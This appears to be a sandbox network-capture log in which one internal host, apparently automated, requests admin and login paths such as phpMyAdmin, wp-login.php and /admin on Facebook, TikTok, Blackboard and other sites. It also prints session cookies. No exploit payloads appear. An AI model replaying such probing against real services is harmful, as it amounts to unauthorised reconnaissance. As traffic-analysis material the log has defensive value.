GET / HTTP/1.1
Host: terna.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:08 UTC  755  IN
HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=0, must-revalidate
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B3WePQwWwRsVmE8AfE7wJhqXRN%2Bxd9RMteo6Nj4oUWGQurwLWtThlDYIWvyuaiANFZMMpQz8a1zjdvp5%2B%2FNYe3BU1K2jaSMcn8UfA6AGuxORbKfBWhDdtcrWEdE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 850abd50ac4e7b91-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:08 UTC  614  IN
Data Ascii: 28c1<!DOCTYPE html><html lang="es"><head><meta charset="utf-8"><title>:. TernaNet .:</title><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="description" content /><meta name="author" content="//bootstraptaste
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: <script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--></head><body><script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-545b9cf52718a43c" async></script><script> window.fbAsyn
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: opdown" data-delay="0" data-close-others="false">Productos <b class=" icon-angle-down"></b></a><ul class="dropdown-menu"><li><a href="vision.html">Visión General</a></li><li><a href="ternanet.html">TernaNet</a></li><li><a href="ternaschool.html">Tern
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: cios</a></li><li><a href="contactopromo">Contacto</a></li></ul></div></div></div></header><section id="featured"><div class="container"><div class="row"><div class="col-lg-12"><div id="main-slider" class="flexslider"><ul class="slides"><l
2024-02-05 11:16:08 UTC  1369  IN
Data Ascii: container"><div class="row"><div class="col-lg-3"><div class="alert alert-success"><h4>Nuestra Solución</h4><p>Ofrecer una plataforma lista, amplia y estable para instituciones de educación.</p></div></div><div class="col-lg-9"><h4>La solución
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 6f 63 65 73 6f 20 73 65 6e 63 69 6c 6c 6f 20 79 20 72 c3 a1 70 69 64 6f 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 2d 67 72 61 79 20 61 6c 69 67 6e 63 65 6e 74 65 72 22 3e 0a 3c 68 34 3e 52 61 70 69 64 65 7a 3c 2f 68 34 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 20 66 61 2d 33 78 22 3e 3c 2f 69 3e 20 3c 2f 64 69 76 3e 0a 3c 70 3e 52 65 64 75 63 65 20 65 6c 20 74 69 65 6d 70 6f 20 65 6e 20 6c 6f 73 20 70 72 6f 63 65 73 6f 73 20 6d 61 73 69 76 6f 73 3c 2f 70 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: oceso sencillo y rpido.</p></div></div></div><div class="col-lg-3"><div class="box"><div class="box-gray aligncenter"><h4>Rapidez</h4><div class="icon"> <i class="fa fa-clock-o fa-3x"></i> </div><p>Reduce el tiempo en los procesos masivos</p>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 61 6a 65 20 63 c3 b3 6d 6f 64 61 6d 65 6e 74 65 3c 2f 68 34 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 6d 69 6c 65 2d 6f 20 66 61 2d 33 78 22 3e 3c 2f 69 3e 20 3c 2f 64 69 76 3e 0a 3c 70 3e 53 65 20 65 6c 65 76 61 20 6c 61 20 65 66 69 63 69 65 6e 63 69 61 20 65 6e 20 65 6c 20 64 65 73 65 6d 70 65 c3 b1 6f 20 64 65 6c 20 70 65 72 73 6f 6e 61 6c 20 64 65 20 63 6f 6e 74 72 6f 6c 20 64 65 20 65 73 74 75 64 69 6f 73 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 2d 67 72 61 79 20 61 6c 69 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: aje cmodamente</h4><div class="icon"> <i class="fa fa-smile-o fa-3x"></i> </div><p>Se eleva la eficiencia en el desempeo del personal de control de estudios</p></div></div></div><div class="col-lg-3"><div class="box"><div class="box-gray alig
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 6f 6c 74 69 70 28 7b 0d 0a 20 20 20 20 20 20 20 20 70 6c 61 63 65 6d 65 6e 74 20 3a 20 27 62 6f 74 74 6f 6d 27 0d 0a 20 20 20 20 7d 29 3b 0d 0a 09 24 28 22 2e 74 6f 6f 6c 74 69 70 2d 65 78 61 6d 70 6c 65 73 20 73 70 61 6e 22 29 2e 74 6f 6f 6c 74 69 70 28 7b 0d 0a 20 20 20 20 20 20 20 20 70 6c 61 63 65 6d 65 6e 74 20 3a 20 27 62 6f 74 74 6f 6d 27 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 09 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: oltip({ placement : 'bottom' });$(".tooltip-examples span").tooltip({ placement : 'bottom' });});</script><script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).pu
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC244INData Raw: 74 6f 6d 5f 6c 65 66 74 2f 28 6d 61 29 2f 62 72 2f 28 68 69 64 65 5f 6f 66 66 6c 69 6e 65 29 2f 74 72 75 65 2f 28 74 6f 70 29 2f 33 35 30 2f 28 75 6e 69 74 73 29 2f 70 69 78 65 6c 73 2f 28 6c 65 61 76 65 61 6d 65 73 73 61 67 65 29 2f 74 72 75 65 2f 28 74 68 65 6d 65 29 2f 31 3f 72 3d 27 2b 72 65 66 66 65 72 65 72 2b 27 26 6c 3d 27 2b 6c 6f 63 61 74 69 6f 6e 3b 0d 0a 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 3b 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 70 6f 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tom_left/(ma)/br/(hide_offline)/true/(top)/350/(units)/pixels/(leaveamessage)/true/(theme)/1?r='+refferer+'&l='+location;var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);})();</script></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
117 | 192.168.2.6 | 63162 | 104.18.41.153 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:08 UTC | 172 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: app.plex.tv
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:08 UTC | 342 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
CF-Cache-Status: HIT
Server: cloudflare
CF-RAY: 850abd515c5db029-ATL


Session ID | Source IP | Source Port | Destination IP | Destination Port
118 | 192.168.2.6 | 62978 | 31.13.65.1 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:08 UTC | 189 | OUT | GET /administrator/index.php HTTP/1.1
Host: web.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:08 UTC | 1059 | IN | HTTP/1.1 302 Found
Location: https://www.facebook.com/administrator/index.php?_rdc=1&_rdr
reporting-endpoints: coop_report="https://web.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://web.facebook.com/browser_reporting/coep/?minimize=0"
report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/web.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/web.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
x-fb-zr-redirect: 02|1707218168|
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: VTkwbVzdMbPTmGvFLy/yr/C4P2w5z4iRZf4RfAnM8OZ8yG2Oa7KdQXWIfK3HZ7u+aFK3jrObiK6ArV/k43ClFQ==
Date: Mon, 05 Feb 2024 11:16:08 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
119 | 192.168.2.6 | 63125 | 104.255.105.79 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:08 UTC | 185 | OUT | GET /phpMyAdmin/ HTTP/1.0
Host: signin.rockstargames.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:08 UTC | 1463 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
DBI: 3ca83f01b13fa034f28a72e0b8f9440409074eb0
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: default-src *.rockstargames.com s.rsg.sc; script-src 'nonce-XbLHj6rNlJ7LxP3t6stQcZQjTwCPQ0wdyRVI1Z1zfVE=' 'report-sample' *.rockstargames.com s.rsg.sc cdn.cookielaw.org www.google-analytics.com *.googletagmanager.com rockstar-api.arkoselabs.com rockstar-api.arkoselabs.cn recaptcha.net; img-src https:; frame-src *.arkoselabs.com recaptcha.net; connect-src *.rockstargames.com *.google-analytics.com *.doubleclick.net *.sentry.io *.lifeinvader.com *.analytics.google.com *.googletagmanager.com cdn.cookielaw.org geolocation.onetrust.com privacyportal.onetrust.com; style-src 'unsafe-inline' *.rockstargames.com s.rsg.sc translate.googleapis.com; object-src 'none'; font-src fonts.gstatic.com; report-uri https://scapi.rockstargames.com/report/cspViolation;
CorrelationId: b1cc31ee-bc01-4066-a7dc-441bb2066e5f
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: session-id=676fb8d8-0e43-404e-a02c-0a3c83d5a900; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=Edge
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 3109
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS01a305c4=01e681cfdbd421e64c6dc3cb4a054f088ccfecb3d0897bff65d5da4cc8aecad6108a8618e148bc645fb0e889f4ec974d2dbf7f4ec8560cc7a968a6a0918dbd89cf99e9b051; Path=/
2024-02-05 11:16:08 UTC  2538  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html>...[if lte IE 10 ]><html class="ielt10" lang="en-US"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html class="" lang="en-US">...<![endif]--><head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta charset="u
2024-02-05 11:16:08 UTC  571  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ":"prod","errorReporting":{"enabled":true,"sampleRate":1.0,"ignoreErrors":[],"denyUrls":[],"allowUrls":["^https:\\/\\/(?!www).*\\.rockstargames\\.com","^https:\\/\\/(signin-)?s\\.rsg\\.sc"]},"performanceTracing":{"enabled":true,"sampleRate":0.0025,"includ


Session ID  Source IP    Source Port  Destination IP  Destination Port
120         192.168.2.6  63416        172.66.43.117   443
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:08 UTC  167  OUT  GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:08 UTC  667  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                location: https://login.adf.ly/admin/
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QMeXEtrIr1qWP1ZJ6zXWPC5M5pxNt5UhF4WW1wxmXH8gwAevyr5zot%2BqJLGMSVcK2YTtaAZp4UYco7MZB6E3GoNt0TMbe7ejDHREIp5y9OL%2FdyIHd38aq2vRTZC1r94%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd51a89d7bba-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:08 UTC  702  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial,
2024-02-05 11:16:08 UTC  12  IN  Data Raw: 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: y></html>
2024-02-05 11:16:08 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
121         192.168.2.6  63461        13.249.120.4    443
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:08 UTC  165  OUT  GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: tiktok.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:08 UTC  460  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.tiktok.com/admin
                                                                                                                                                                                                                                                                                                                                                                X-Cache: FunctionGeneratedResponse from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 330536604823d44e02dcc57f15f8ed90.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: JrrDXZmpdxL4YkwQi-9j_Rl7Zy93_2fbt1of7yjcRinBjyQKoGDXIg==
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload


Session ID  Source IP    Source Port  Destination IP  Destination Port
122         192.168.2.6  63187        44.195.133.145  443
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:08 UTC  335  OUT  GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:08 UTC  1165  IN  HTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=A41748C5FFBE0AA3717601AC030D7592; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142568,id:AA5B0F56EE09038D64C6A202F41CF905,signature:a5b7125ed6ba37cb61202ccfee1c2f3a72304b38c669361818b7f385ffa34717,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16c6130f-60d2-4ae4-9489-4e6878a2dd45; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-220-254.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
2024-02-05 11:16:08 UTC | 15208 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3b60... This login.jsp file is tagged with comments identifying sections for easy editing -->... This section below calls various servlets from the Learn environment and other things you don't want to touch. Do not delete anything in this section -
2024-02-05 11:16:08 UTC | 16384 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e01fise,MO:i._A.MutationObserver,FETCH:i._A.fetch}),e}function c(e,t){let r=a();r.initializedAgents??={},t.initializedAt={ms:(0,n.z)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]
2024-02-05 11:16:08 UTC | 16384 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <link rel="SHORTCUT ICON" type="image/x-icon" href="/favicon.ico"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/ultra.css?v=3900.84.0-rel.31+aedff82" id="css_0"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/multi_fa
2024-02-05 11:16:08 UTC | 16384 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: arram,afar,Rab\'al-Awwal,Rab\'ath-Thn,Jumd\'al-l,Jumd\'ath-Thniya,Rajab,Shabn,Raman,Shawwl,Dh\'al-Qada,Dh\'al-ijja'; LOCALE_SETTINGS['LOCALE_SETTINGS.GREETING'] = 'Bienvenido, {1}'; LOCALE_SETTING
2024-02-05 11:16:08 UTC | 16384 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: deleteCookie("JSESSIONID", "/deployment", null, true); deleteCookie("JSESSIONID", "/content_area", null, true); deleteCookie("JSESSIONID", "/portfolio", null, true); deleteCookie("JSESSIONID", "/evidence_area", null, true); de
2024-02-05 11:16:08 UTC | 12563 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div class="mfa-modal-title"> <h1 id="mfa-verification-title" >Autenticacin de mltiples factores</h1> </div> <div class="verification-modal-body"> <div class="verification-modal-body-description"> <label for="totp-verific


Session ID | Source IP | Source Port | Destination IP | Destination Port
123 | 192.168.2.6 | 63394 | 31.13.65.1 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:08 UTC | 179 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:08 UTC | 389 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/PhpMyAdmin/?locale=hi_IN&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: R+jhCoHhnj8OxysF9L4pXjhY2TqO7WfajgtzEngAyNynLoq0eLQHwFQMuJ9Qwg0wJiXZoXcLd/p4Ahd/LaLupw==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
124 | 192.168.2.6 | 63158 | 44.195.133.145 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:08 UTC | 334 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EDDAF7B9110B0A46B575850AB86F0E3E0AEC9356593FDDBE1D721FD3E4C0BAB24
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:08 UTC | 1165 | IN | HTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=E41B23B8FE75D2739726BB1165CA0934; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142568,id:446E98E312C73E260FE257940BB8F838,signature:27310f316af6195334c1d86b89c65000c4d2c30782f5bbb59aeb5b46e56fe9f2,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16555f0a-6176-4660-9dae-094bfc8e1899; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-255-211.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
2024-02-05 11:16:08 UTC | 15208 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3b60... This login.jsp file is tagged with comments identifying sections for easy editing -->... This section below calls various servlets from the Learn environment and other things you don't want to touch. Do not delete anything in this section -
2024-02-05 11:16:08 UTC | 16384 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ff8ise,MO:i._A.MutationObserver,FETCH:i._A.fetch}),e}function c(e,t){let r=a();r.initializedAgents??={},t.initializedAt={ms:(0,n.z)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]
2024-02-05 11:16:08 UTC | 16384 | IN
